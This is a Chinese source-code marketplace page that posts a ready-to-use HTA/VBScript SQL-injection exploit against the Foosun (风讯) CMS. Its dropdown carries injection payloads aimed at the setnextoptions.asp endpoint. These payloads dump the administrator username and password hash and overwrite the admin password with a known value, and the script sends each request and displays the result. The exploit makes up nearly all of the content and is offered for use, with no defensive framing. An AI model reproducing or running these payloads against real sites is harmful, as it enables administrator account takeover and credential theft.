源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

申请开店
全部源码分类
首页 源码街 任务需求 版权中心 备案服务 商家入驻

风讯注入exp(hta版)代码发布

  • 时间:2021-07-11 17:09 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:风讯注入exp(hta版)代码发布
<SCRIPT LANGUAGE="VBScript"> Sub Window_onLoad     window.resizeTo 450,380     window.moveTo 300, 300 End Sub  </SCRIPT> <SCRIPT LANGUAGE="VBScript"> Function getHTTPPage(Path)        t = GetBody(Path)        getHTTPPage = BytesToBstr(t, "GB2312")       document.getElementById("url").innerText=getHTTPPage End Function </script> <SCRIPT LANGUAGE="VBScript"> Function GetBody(url)       On Error Resume Next       Set Retrieval = CreateObject("Microsoft.XMLHTTP")       With Retrieval           .Open "Get", url, False, "", ""           .Send            GetBody = .ResponseBody       End With       Set Retrieval = Nothing End Function Function BytesToBstr(Body, Cset)       Dim objstream       Set objstream = CreateObject("adodb.stream")        objstream.Type = 1        objstream.Mode = 3        objstream.Open        objstream.Write Body        objstream.Position = 0        objstream.Type = 2        objstream.Charset = Cset        BytesToBstr = objstream.ReadText        objstream.Close       Set objstream = Nothing End Function </script> <title>by lcx</title> <input id="urlcode" NAME="urlcode" size="60" value="http://风讯url/user/setnextoptions.asp"> <select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)> <option value="">风讯sql版注入,至于其它备份shell的语句懒得写了</option> <option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option> <option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option> <option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word='a0b923820dcc509a' where id=1--">更改管理员密码为1</option> </select> <TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA>
  • 全部评论(0)
上一篇:浅谈hibernate中多表映射关系配置
下一篇:个人学习之作 hta <font color="red">原创</font>
关于我们 | 广告合作 | 联系我们 | 隐私条款 | 免责声明 | 网站地图

苏ICP备2024110244号-2      苏公网安备32050702011978号      增值电信业务经营许可证编号:苏B2-20251499   |  Copyright 2018 - 2025   源码网商城 (www.ymwmall.com) 版权所有

联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部